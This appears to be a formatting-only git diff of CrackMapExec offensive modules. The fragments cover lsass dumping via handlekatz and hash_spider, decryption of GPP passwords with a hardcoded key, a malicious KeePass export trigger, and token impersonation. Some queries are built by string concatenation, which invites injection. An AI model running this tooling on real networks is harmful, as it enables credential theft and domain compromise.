enumerate(conf["products"]): for pipe in product["pipes"]: if pathlib.PurePath(fl).match(pipe["name"]): - context.log.debug( - f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})" - ) + context.log.debug(f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})") if product["name"] not in results: results[product["name"]] = {} if "pipes" not in results[product["name"]]: @@ -168,9 +154,7 @@ class LsaLookupNames: # Authenticate if specified if self.authn and hasattr(rpc_transport, "set_credentials"): # This method exists only for selected protocol sequences. - rpc_transport.set_credentials( - self.username, self.password, self.domain, self.lmhash, self.nthash - ) + rpc_transport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash) if self.doKerberos: rpc_transport.set_kerberos(self.doKerberos, kdcHost=self.dcHost) @@ -323,9 +307,7 @@ conf = { }, { "name": "Carbon Black App Control", - "services": [ - {"name": "Parity", "description": "Carbon Black App Control Agent"} - ], + "services": [{"name": "Parity", "description": "Carbon Black App Control Agent"}], "pipes": [], }, { diff --git a/cme/modules/enum_dns.py b/cme/modules/enum_dns.py index 49c572d3..0e0c2ae0 100644 --- a/cme/modules/enum_dns.py +++ b/cme/modules/enum_dns.py @@ -33,9 +33,7 @@ class CMEModule: def on_admin_login(self, context, connection): if not self.domains: domains = [] - output = connection.wmi( - "Select Name FROM MicrosoftDNS_Zone", "root\\microsoftdns" - ) + output = connection.wmi("Select Name FROM MicrosoftDNS_Zone", "root\\microsoftdns") if output: for result in output: @@ -72,8 +70,6 @@ class CMEModule: context.log.highlight("\t" + d) data += "\t" + d + "\n" - log_name = "DNS-Enum-{}-{}.log".format( - connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S") - ) + log_name = "DNS-Enum-{}-{}.log".format(connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.display(f"Saved raw output to {log_name}") diff --git a/cme/modules/example_module.py b/cme/modules/example_module.py index f8a84dfa..4cab21d3 100644 --- a/cme/modules/example_module.py +++ b/cme/modules/example_module.py @@ -12,9 +12,7 @@ class CMEModule: description = "I do something" supported_protocols = [] opsec_safe = True # Does the module touch disk? - multiple_hosts = ( - True # Does it make sense to run this module on multiple hosts at a time? - ) + multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time? def __init__(self, context=None, module_options=None): self.context = context diff --git a/cme/modules/firefox.py b/cme/modules/firefox.py index c3fdee96..c58de4e1 100644 --- a/cme/modules/firefox.py +++ b/cme/modules/firefox.py @@ -14,9 +14,7 @@ class CMEModule: description = "Dump credentials from Firefox" supported_protocols = ["smb"] opsec_safe = True # Does the module touch disk? - multiple_hosts = ( - True # Does it make sense to run this module on multiple hosts at a time? - ) + multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time? def options(self, context, module_options): """Dump credentials from Firefox""" diff --git a/cme/modules/get-desc-users.py b/cme/modules/get-desc-users.py index 91d340f2..1832b0bd 100644 --- a/cme/modules/get-desc-users.py +++ b/cme/modules/get-desc-users.py @@ -17,9 +17,7 @@ class CMEModule: description = "Get description of the users. May contained password" supported_protocols = ["ldap"] opsec_safe = True # Does the module touch disk? - multiple_hosts = ( - True # Does it make sense to run this module on multiple hosts at a time? - ) + multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time? def options(self, context, module_options): """ @@ -36,11 +34,7 @@ class CMEModule: self.MINLENGTH = module_options["MINLENGTH"] if "PASSWORDPOLICY" in module_options: self.PASSWORDPOLICY = True - self.regex = re.compile( - "((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" - + self.MINLENGTH - + ",}" - ) # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following + self.regex = re.compile("((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" + self.MINLENGTH + ",}") # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following def on_login(self, context, connection): """Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection""" @@ -56,9 +50,7 @@ class CMEModule: ) except ldap_impacket.LDAPSearchError as e: if e.getErrorString().find("sizeLimitExceeded") >= 0: - context.log.debug( - "sizeLimitExceeded exception caught, giving up and processing the data received" - ) + context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received") # We reached the sizeLimit, process the answers we have already and that's it. Until we implement # paged queries resp = e.getAnswers() @@ -84,17 +76,13 @@ class CMEModule: answers.append([sAMAccountName, description]) except Exception as e: context.log.debug("Exception:", exc_info=True) - context.log.debug( - "Skipping item, cannot process due to error %s" % str(e) - ) + context.log.debug("Skipping item, cannot process due to error %s" % str(e)) pass answers = self.filter_answer(context, answers) if len(answers) > 0: context.log.success("Found following users: ") for answer in answers: - context.log.highlight( - "User: {} description: {}".format(answer[0], answer[1]) - ) + context.log.highlight("User: {} description: {}".format(answer[0], answer[1])) def filter_answer(self, context, answers): # No option to filter @@ -119,16 +107,9 @@ class CMEModule: if self.regex.search(description): conditionPasswordPolicy = True - if ( - self.FILTER - and conditionFilter - and self.PASSWORDPOLICY - and conditionPasswordPolicy - ): + if self.FILTER and conditionFilter and self.PASSWORDPOLICY and conditionPasswordPolicy: answersFiltered.append([answer[0], description]) - elif ( - not self.FILTER and self.PASSWORDPOLICY and conditionPasswordPolicy - ): + elif not self.FILTER and self.PASSWORDPOLICY and conditionPasswordPolicy: answersFiltered.append([answer[0], description]) elif not self.PASSWORDPOLICY and self.FILTER and conditionFilter: answersFiltered.append([answer[0], description]) diff --git a/cme/modules/get_netconnections.py b/cme/modules/get_netconnections.py index 8ee9e1d5..df8c636e 100755 --- a/cme/modules/get_netconnections.py +++ b/cme/modules/get_netconnections.py @@ -27,19 +27,13 @@ class CMEModule: def on_admin_login(self, context, connection): data = [] - cards = connection.wmi( - f"select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration" - ) + cards = connection.wmi(f"select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration") for c in cards: if c["IPAddress"].get("value"): - context.log.success( - f"IP Address: {c['IPAddress']['value']}\tSearch Domain: {c['DNSDomainSuffixSearchOrder']['value']}" - ) + context.log.success(f"IP Address: {c['IPAddress']['value']}\tSearch Domain: {c['DNSDomainSuffixSearchOrder']['value']}") data.append(cards) - log_name = "network-connections-{}-{}.log".format( - connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S") - ) + log_name = "network-connections-{}-{}.log".format(connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(json.dumps(data), log_name) context.log.display("Saved raw output to {}".format(log_name)) diff --git a/cme/modules/gpp_password.py b/cme/modules/gpp_password.py index 251e6c89..136d0251 100644 --- a/cme/modules/gpp_password.py +++ b/cme/modules/gpp_password.py @@ -28,9 +28,7 @@ class CMEModule: for share in shares: if share["name"] == "SYSVOL" and "READ" in share["access"]: context.log.success("Found SYSVOL share") - context.log.display( - "Searching for potential XML files containing passwords" - ) + context.log.display("Searching for potential XML files containing passwords") paths = connection.spider( "SYSVOL", @@ -90,9 +88,7 @@ class CMEModule: password = self.decrypt_cpassword(props["cpassword"]) - context.log.success( - "Found credentials in {}".format(path) - ) + context.log.success("Found credentials in {}".format(path)) context.log.highlight("Password: {}".format(password)) for k, v in props.items(): if k != "cpassword": @@ -111,9 +107,7 @@ class CMEModule: # Stolen from hhttps://gist.github.com/andreafortuna/4d32100ae03abead52e8f3f61ab70385 # From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2 - key = unhexlify( - "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b" - ) + key = unhexlify("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b") cpassword += "=" * ((4 - len(cpassword) % 4) % 4) password = b64decode(cpassword) IV = "\x00" * 16 diff --git a/cme/modules/groupmembership.py b/cme/modules/groupmembership.py index 7d1bae9c..459d6032 100644 --- a/cme/modules/groupmembership.py +++ b/cme/modules/groupmembership.py @@ -32,9 +32,7 @@ class CMEModule: exit(1) self.user = module_options["USER"] else: - context.log.fail( - "Missing USER option, use --options to list available parameters" - ) + context.log.fail("Missing USER option, use --options to list available parameters") exit(1) def on_login(self, context, connection): @@ -51,9 +49,7 @@ class CMEModule: ) except ldap_impacket.LDAPSearchError as e: if e.getErrorString().find("sizeLimitExceeded") >= 0: - context.log.debug( - "sizeLimitExceeded exception caught, giving up and processing the data received" - ) + context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received") # We reached the sizeLimit, process the answers we have already and that's it. Until we implement # paged queries resp = e.getAnswers() @@ -85,14 +81,10 @@ class CMEModule: except Exception as e: context.log.debug("Exception:", exc_info=True) - context.log.debug( - "Skipping item, cannot process due to error %s" % str(e) - ) + context.log.debug("Skipping item, cannot process due to error %s" % str(e)) pass if len(memberOf) > 0: - context.log.success( - "User: {} is member of following groups: ".format(self.user) - ) + context.log.success("User: {} is member of following groups: ".format(self.user)) for group in memberOf: # Split the string on the "," character to get a list of the group name and parent group names group_parts = group.split(",") diff --git a/cme/modules/handlekatz.py b/cme/modules/handlekatz.py index 0b0fa945..336eaf08 100644 --- a/cme/modules/handlekatz.py +++ b/cme/modules/handlekatz.py @@ -56,17 +56,11 @@ class CMEModule: with open(self.handlekatz_path + self.handlekatz, "wb") as handlekatz: handlekatz.write(self.handlekatz_embeded) - context.log.display( - f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}" - ) + context.log.display(f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}") with open(self.handlekatz_path + self.handlekatz, "rb") as handlekatz: try: - connection.conn.putFile( - self.share, self.tmp_share + self.handlekatz, handlekatz.read - ) - context.log.success( - f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}" - ) + connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read) + context.log.success(f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}") except Exception as e: context.log.fail(f"Error writing file to share {self.share}: {e}") @@ -85,15 +79,7 @@ class CMEModule: pid = p.split(",")[1][1:-1] context.log.debug(f"pid: {pid}") - command = ( - self.tmp_dir - + self.handlekatz - + " --pid:" - + pid - + " --outfile:" - + self.tmp_dir - + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log" - ) + command = self.tmp_dir + self.handlekatz + " --pid:" + pid + " --outfile:" + self.tmp_dir + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log" context.log.display(f"Executing command {command}") p = connection.execute(command, True) @@ -118,32 +104,22 @@ class CMEModule: with open(self.dir_result + machine_name, "wb+") as dump_file: try: - connection.conn.getFile( - self.share, self.tmp_share + machine_name, dump_file.write - ) - context.log.success( - f"Dumpfile of lsass.exe was transferred to {self.dir_result + machine_name}" - ) + connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write) + context.log.success(f"Dumpfile of lsass.exe was transferred to {self.dir_result + machine_name}") except Exception as e: context.log.fail(f"Error while get file: {e}") try: connection.conn.deleteFile(self.share, self.tmp_share + self.handlekatz) - context.log.success( - f"Deleted handlekatz file on the {self.share} share" - ) + context.log.success(f"Deleted handlekatz file on the {self.share} share") except Exception as e: - context.log.fail( - f"[OPSEC] Error deleting handlekatz file on share {self.share}: {e}" - ) + context.log.fail(f"[OPSEC] Error deleting handlekatz file on share {self.share}: {e}") try: connection.conn.deleteFile(self.share, self.tmp_share + machine_name) context.log.success(f"Deleted lsass.dmp file on the {self.share} share") except Exception as e: - context.log.fail( - f"[OPSEC] Error deleting lsass.dmp file on share {self.share}: {e}" - ) + context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on share {self.share}: {e}") h_in = open(self.dir_result + machine_name, "rb") h_out = open(self.dir_result + machine_name + ".decode", "wb") @@ -151,13 +127,9 @@ class CMEModule: bytes_in = bytearray(h_in.read()) bytes_in_len = len(bytes_in) - context.log.display( - f"Deobfuscating, this might take a while (size: {bytes_in_len} bytes)" - ) + context.log.display(f"Deobfuscating, this might take a while (size: {bytes_in_len} bytes)") - chunks = [ - bytes_in[i : i + 1000000] for i in range(0, bytes_in_len, 1000000) - ] + chunks = [bytes_in[i : i + 1000000] for i in range(0, bytes_in_len, 1000000)] for chunk in chunks: for i in range(0, len(chunk)): chunk[i] ^= 0x41 @@ -184,28 +156,17 @@ class CMEModule: ] for luid in pypy_parse.logon_sessions: for ssp in ssps: - for cred in getattr( - pypy_parse.logon_sessions[luid], ssp, [] - ): + for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []): domain = getattr(cred, "domainname", None) username = getattr(cred, "username", None) password = getattr(cred, "password", None) NThash = getattr(cred, "NThash", None) if NThash is not None: NThash = NThash.hex() - if ( - username - and (password or NThash) - and "$" not in username - ): + if username and (password or NThash) and "$" not in username: print_pass = password if password else NThash - context.log.highlight( - domain + "\\" + username + ":" + print_pass - ) - if ( - "." not in domain - and domain.upper() in connection.domain.upper() - ): + context.log.highlight(domain + "\\" + username + ":" + print_pass) + if "." not in domain and domain.upper() in connection.domain.upper(): domain = connection.domain credz_bh.append( { diff --git a/cme/modules/hash_spider.py b/cme/modules/hash_spider.py index b1de8cff..1862adc1 100644 --- a/cme/modules/hash_spider.py +++ b/cme/modules/hash_spider.py @@ -40,9 +40,7 @@ def neo4j_local_admins(context, driver): global admin_results try: session = driver.session() - admins = session.run( - "MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC" - ) # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts + admins = session.run("MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC") # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts context.log.success("Admins and PCs obtained.") except Exception: context.log.fail("Could not pull admins") @@ -51,9 +49,7 @@ def neo4j_local_admins(context, driver): def create_db(local_admins, dbconnection, cursor): - cursor.execute( - """CREATE TABLE if not exists pc_and_admins ("pc_name" TEXT UNIQUE, "local_admins" TEXT, "dumped" TEXT)""" - ) + cursor.execute("""CREATE TABLE if not exists pc_and_admins ("pc_name" TEXT UNIQUE, "local_admins" TEXT, "dumped" TEXT)""") for result in local_admins: cursor.execute( "INSERT OR IGNORE INTO pc_and_admins(pc_name, local_admins, dumped) VALUES(?, ?, ?)", @@ -66,18 +62,14 @@ def create_db(local_admins, dbconnection, cursor): ), ) dbconnection.commit() - cursor.execute( - """CREATE TABLE if not exists admin_users("username" TEXT UNIQUE, "hash" TEXT, "password" TEXT)""" - ) + cursor.execute("""CREATE TABLE if not exists admin_users("username" TEXT UNIQUE, "hash" TEXT, "password" TEXT)""") admin_users = [] for result in local_admins: for user in result.get("USERS"): if user not in admin_users: admin_users.append(user) for user in admin_users: - cursor.execute( - """INSERT OR IGNORE INTO admin_users(username) VALUES(?)""", [user] - ) + cursor.execute("""INSERT OR IGNORE INTO admin_users(username) VALUES(?)""", [user]) dbconnection.commit() @@ -92,50 +84,29 @@ def process_creds(context, connection, credentials_data, dbconnection, cursor, d nthash = result["nthash"] password = result["password"] if result["password"] is not None: - context.log.highlight( - f"Found a cleartext password for: {username}:{password}. Adding to the DB and marking user as owned in BH." - ) + context.log.highlight(f"Found a cleartext password for: {username}:{password}. Adding to the DB and marking user as owned in BH.") cursor.execute( - "UPDATE admin_users SET password = ? WHERE username LIKE '" - + username - + "%'", + "UPDATE admin_users SET password = ? WHERE username LIKE '" + username + "%'", [password], ) username = f"{username.upper()}@{context.log.extra['host'].upper()}" dbconnection.commit() session = driver.session() - session.run( - 'MATCH (u) WHERE (u.name = "' - + username - + '") SET u.owned=True RETURN u,u.name,u.owned' - ) - if ( - nthash == "aad3b435b51404eeaad3b435b51404ee" - or nthash == "31d6cfe0d16ae931b73c59d7e0c089c0" - ): + session.run('MATCH (u) WHERE (u.name = "' + username + '") SET u.owned=True RETURN u,u.name,u.owned') + if nthash == "aad3b435b51404eeaad3b435b51404ee" or nthash == "31d6cfe0d16ae931b73c59d7e0c089c0": context.log.fail(f"Hash for {username} is expired.") elif username not in found_users and nthash is not None: - context.log.highlight( - f"Found hashes for: '{username}:{nthash}'. Adding them to the DB and marking user as owned in BH." - ) + context.log.highlight(f"Found hashes for: '{username}:{nthash}'. Adding them to the DB and marking user as owned in BH.") found_users.append(username) cursor.execute( - "UPDATE admin_users SET hash = ? WHERE username LIKE '" - + username - + "%'", + "UPDATE admin_users SET hash = ? WHERE username LIKE '" + username + "%'", [nthash], ) dbconnection.commit() username = f"{username.upper()}@{context.log.extra['host'].upper()}" session = driver.session() - session.run( - 'MATCH (u) WHERE (u.name = "' - + username - + '") SET u.owned=True RETURN u,u.name,u.owned' - ) - path_to_da = session.run( - "MATCH p=shortestPath((n)-[*1..]->(m)) WHERE n.owned=true AND m.name=~ '.*DOMAIN ADMINS.*' RETURN p" - ) + session.run('MATCH (u) WHERE (u.name = "' + username + '") SET u.owned=True RETURN u,u.name,u.owned') + path_to_da = session.run("MATCH p=shortestPath((n)-[*1..]->(m)) WHERE n.owned=true AND m.name=~ '.*DOMAIN ADMINS.*' RETURN p") paths = [record for record in path_to_da.data()] for path in paths: @@ -144,9 +115,7 @@ def process_creds(context, connection, credentials_data, dbconnection, cursor, d for item in value: if type(item) == dict: if {item["name"]} not in reported_da: - context.log.success( - f"You have a valid path to DA as {item['name']}." - ) + context.log.success(f"You have a valid path to DA as {item['name']}.") reported_da.append({item["name"]}) exit() @@ -167,9 +136,7 @@ def initial_run(connection, cursor): class CMEModule: name = "hash_spider" - description = ( - "Dump lsass recursively from a given hash using BH to find local admins" - ) + description = "Dump lsass recursively from a given hash using BH to find local admins" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = True @@ -193,9 +160,7 @@ class CMEModule: self.reset_dumped = module_options.get("RESET_DUMPED", False) self.reset = module_options.get("RESET", False) - def run_lsassy( - self, context, connection, cursor - ): # copied and pasted from lsassy_dumper & added cursor + def run_lsassy(self, context, connection, cursor): # copied and pasted from lsassy_dumper & added cursor # lsassy uses a custom "success" level, which requires initializing its logger or an error will be thrown # lsassy also removes all other handlers and overwrites the formatter which is bad (we want ours) # so what we do is define "success" as a logging level, then do nothing with the output @@ -220,12 +185,8 @@ class CMEModule: domain=domain_name, ) if session.smb_session is None: - context.log.fail( - "Couldn't connect to remote host. Password likely expired/changed. Removing from DB." - ) - cursor.execute( - f"UPDATE admin_users SET hash = NULL WHERE username LIKE '{username}'" - ) + context.log.fail("Couldn't connect to remote host. Password likely expired/changed. Removing from DB.") + cursor.execute(f"UPDATE admin_users SET hash = NULL WHERE username LIKE '{username}'") return False dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method) if dumper is None: @@ -240,11 +201,7 @@ class CMEModule: ImpacketFile.delete(session, file.get_file_path()) if credentials is None: credentials = [] - credentials = [ - cred.get_object() - for cred in credentials - if not cred.get_username().endswith("$") - ] + credentials = [cred.get_object() for cred in credentials if not cred.get_username().endswith("$")] credentials_unique = [] credentials_output = [] for cred in credentials: @@ -271,21 +228,15 @@ class CMEModule: def spider_pcs(self, context, connection, cursor, dbconnection, driver): cursor.execute("SELECT * from admin_users WHERE hash is not NULL") compromised_users = cursor.fetchall() - cursor.execute( - "SELECT pc_name,local_admins FROM pc_and_admins WHERE dumped LIKE 'FALSE'" - ) + cursor.execute("SELECT pc_name,local_admins FROM pc_and_admins WHERE dumped LIKE 'FALSE'") admin_access = cursor.fetchall() for user in compromised_users: for pc in admin_access: if user[0] in pc[1]: - cursor.execute( - f"SELECT * FROM pc_and_admins WHERE pc_name = '{pc[0]}' AND dumped NOT LIKE 'TRUE'" - ) + cursor.execute(f"SELECT * FROM pc_and_admins WHERE pc_name = '{pc[0]}' AND dumped NOT LIKE 'TRUE'") more_to_dump = cursor.fetchall() if len(more_to_dump) > 0: - context.log.display( - f"User {user[0]} has more access to {pc[0]}. Attempting to dump." - ) + context.log.display(f"User {user[0]} has more access to {pc[0]}. Attempting to dump.") connection.domain = user[0].split("@")[1] setattr(connection, "host", pc[0].split(".")[0]) setattr(connection, "username", user[0].split("@")[0]) @@ -293,11 +244,7 @@ class CMEModule: setattr(connection, "nthash", user[1]) try: self.run_lsassy(context, connection, cursor) - cursor.execute( - "UPDATE pc_and_admins SET dumped = 'TRUE' WHERE pc_name LIKE '" - + pc[0] - + "%'" - ) + cursor.execute("UPDATE pc_and_admins SET dumped = 'TRUE' WHERE pc_name LIKE '" + pc[0] + "%'") process_creds( context, @@ -307,15 +254,11 @@ class CMEModule: cursor, driver, ) - self.spider_pcs( - context, connection, cursor, dbconnection, driver - ) + self.spider_pcs(context, connection, cursor, dbconnection, driver) except Exception: context.log.fail(f"Failed to dump lsassy on {pc[0]}") if len(admin_access) > 0: - context.log.fail( - "No more local admin access known. Please try re-running Bloodhound with newly found accounts." - ) + context.log.fail("No more local admin access known. Please try re-running Bloodhound with newly found accounts.") exit() def on_admin_login(self, context, connection): @@ -348,17 +291,13 @@ class CMEModule: neo4j_uri = connection.config.get("BloodHound", "bh_uri") neo4j_port = connection.config.get("BloodHound", "bh_port") neo4j_db = f"bolt://{neo4j_uri}:{neo4j_port}" - driver = GraphDatabase.driver( - neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False - ) + driver = GraphDatabase.driver(neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False) neo4j_conn(context, connection, driver) neo4j_local_admins(context, driver) create_db(admin_results, dbconnection, cursor) initial_run(connection, cursor) context.log.display("Running lsassy") self.run_lsassy(context, connection, cursor) - process_creds( - context, connection, credentials_data, dbconnection, cursor, driver - ) + process_creds(context, connection, credentials_data, dbconnection, cursor, driver) context.log.display("🕷️ Starting to spider 🕷️") self.spider_pcs(context, connection, cursor, dbconnection, driver) diff --git a/cme/modules/impersonate.py b/cme/modules/impersonate.py index 0653ef21..38c4733b 100644 --- a/cme/modules/impersonate.py +++ b/cme/modules/impersonate.py @@ -10,9 +10,7 @@ from os import path class CMEModule: name = "impersonate" - description = ( - "List and impersonate tokens to run command as locally logged on users" - ) + description = "List and impersonate tokens to run command as locally logged on users" supported_protocols = ["smb"] opsec_safe = True # could be flagged multiple_hosts = True @@ -63,9 +61,7 @@ class CMEModule: context.log.display(f"Uploading {self.impersonate}") with open(file_to_upload, "rb") as impersonate: try: - connection.conn.putFile( - self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read - ) + connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read) context.log.success(f"Impersonate binary successfully uploaded") except Exception as e: context.log.fail(f"Error writing file to share {self.tmp_share}: {e}") @@ -89,12 +85,8 @@ class CMEModule: if impersonated_user: context.log.display(f"Executing {self.cmd} as {impersonated_user}") - command = ( - f'{self.tmp_dir}Impersonate.exe exec {self.token} "{self.cmd}"' - ) - for line in connection.execute( - command, True, methods=["smbexec"] - ).splitlines(): + command = f'{self.tmp_dir}Impersonate.exe exec {self.token} "{self.cmd}"' + for line in connection.execute(command, True, methods=["smbexec"]).splitlines(): context.log.highlight(line) else: context.log.fail(f"Invalid token ID submitted") @@ -103,9 +95,7 @@ class CMEModule: context.log.fail(f"Error running command: {e}") finally: try: - connection.conn.deleteFile( - self.share, f"{self.tmp_share}{self.impersonate}" - ) + connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}") context.log.success(f"Impersonate binary successfully deleted") except Exception as e: context.log.fail(f"Error deleting Impersonate.exe on {self.share}: {e}") diff --git a/cme/modules/install_elevated.py b/cme/modules/install_elevated.py index 0e3b3d0b..9d00d688 100644 --- a/cme/modules/install_elevated.py +++ b/cme/modules/install_elevated.py @@ -59,24 +59,16 @@ class CMEModule: ) rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle) except rrp.DCERPCSessionError: - context.log.highlight( - "AlwaysInstallElevated Status: 1 (Enabled: Computer Only)" - ) + context.log.highlight("AlwaysInstallElevated Status: 1 (Enabled: Computer Only)") return if aie_user_value == 0: - context.log.highlight( - "AlwaysInstallElevated Status: 1 (Enabled: Computer Only)" - ) + context.log.highlight("AlwaysInstallElevated Status: 1 (Enabled: Computer Only)") else: context.log.highlight("AlwaysInstallElevated Status: 1 (Enabled)") finally: try: remote_ops.finish() except scmr.DCERPCSessionError as e: - context.log.debug( - f"Received SessionError while attempting to clean up logins: {e}" - ) + context.log.debug(f"Received SessionError while attempting to clean up logins: {e}") except Exception as e: - context.log.debug( - f"Received general exception while attempting to clean up logins: {e}" - ) + context.log.debug(f"Received general exception while attempting to clean up logins: {e}") diff --git a/cme/modules/keepass_discover.py b/cme/modules/keepass_discover.py index b3d894cd..4deddaaf 100644 --- a/cme/modules/keepass_discover.py +++ b/cme/modules/keepass_discover.py @@ -40,12 +40,8 @@ class CMEModule: if self.search_type == "ALL" or self.search_type == "PROCESS": # search for keepass process search_keepass_process_command_str = 'powershell.exe "Get-Process kee* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"' - search_keepass_process_output_csv = connection.execute( - search_keepass_process_command_str, True - ) # we return the powershell command as a CSV for easier column parsing - csv_reader = reader( - search_keepass_process_output_csv.split("\n"), delimiter="," - ) + search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True) # we return the powershell command as a CSV for easier column parsing + csv_reader = reader(search_keepass_process_output_csv.split("\n"), delimiter=",") next(csv_reader) # to skip the csv header line row_number = 0 # as csv_reader is an iterator we can't get its length without exhausting it for row in csv_reader: @@ -65,15 +61,9 @@ class CMEModule: # search for keepass-related files if self.search_type == "ALL" or self.search_type == "FILES": - search_keepass_files_payload = "Get-ChildItem -Path {} -Recurse -Force -Include ('KeePass.config.xml','KeePass.exe','*.kdbx') -ErrorAction SilentlyContinue | Select FullName -ExpandProperty FullName".format( - self.search_path - ) - search_keepass_files_cmd = 'powershell.exe "{}"'.format( - search_keepass_files_payload - ) - search_keepass_files_output = connection.execute( - search_keepass_files_cmd, True - ).split("\r\n") + search_keepass_files_payload = "Get-ChildItem -Path {} -Recurse -Force -Include ('KeePass.config.xml','KeePass.exe','*.kdbx') -ErrorAction SilentlyContinue | Select FullName -ExpandProperty FullName".format(self.search_path) + search_keepass_files_cmd = 'powershell.exe "{}"'.format(search_keepass_files_payload) + search_keepass_files_output = connection.execute(search_keepass_files_cmd, True).split("\r\n") found = False found_xml = False for file in search_keepass_files_output: diff --git a/cme/modules/keepass_trigger.py b/cme/modules/keepass_trigger.py index b8459ee1..f20314be 100644 --- a/cme/modules/keepass_trigger.py +++ b/cme/modules/keepass_trigger.py @@ -20,9 +20,7 @@ class CMEModule: """ name = "keepass_trigger" - description = ( - "Set up a malicious KeePass trigger to export the database in cleartext." - ) + description = "Set up a malicious KeePass trigger to export the database in cleartext." supported_protocols = ["smb"] # while the module only executes legit powershell commands on the target (search and edit files) # some EDR like Trend Micro flag base64-encoded powershell as malicious @@ -42,27 +40,19 @@ class CMEModule: # additional parameters self.share = "C$" self.remote_temp_script_path = "C:\\Windows\\Temp\\temp.ps1" - self.keepass_binary_path = ( - "C:\\Program Files\\KeePass Password Safe 2\\KeePass.exe" - ) + self.keepass_binary_path = "C:\\Program Files\\KeePass Password Safe 2\\KeePass.exe" self.local_export_path = "/tmp" self.trigger_name = "export_database" self.poll_frequency_seconds = 5 self.dummy_service_name = "OneDrive Sync KeePass" - with open( - get_ps_script("keepass_trigger_module/RemoveKeePassTrigger.ps1"), "r" - ) as remove_trigger_script_file: + with open(get_ps_script("keepass_trigger_module/RemoveKeePassTrigger.ps1"), "r") as remove_trigger_script_file: self.remove_trigger_script_str = remove_trigger_script_file.read() - with open( - get_ps_script("keepass_trigger_module/AddKeePassTrigger.ps1"), "r" - ) as add_trigger_script_file: + with open(get_ps_script("keepass_trigger_module/AddKeePassTrigger.ps1"), "r") as add_trigger_script_file: self.add_trigger_script_str = add_trigger_script_file.read() - with open( - get_ps_script("keepass_trigger_module/RestartKeePass.ps1"), "r" - ) as restart_keepass_script_file: + with open(get_ps_script("keepass_trigger_module/RestartKeePass.ps1"), "r") as restart_keepass_script_file: self.restart_keepass_script_str = restart_keepass_script_file.read() def options(self, context, module_options): @@ -107,16 +97,12 @@ class CMEModule: "CLEAN", 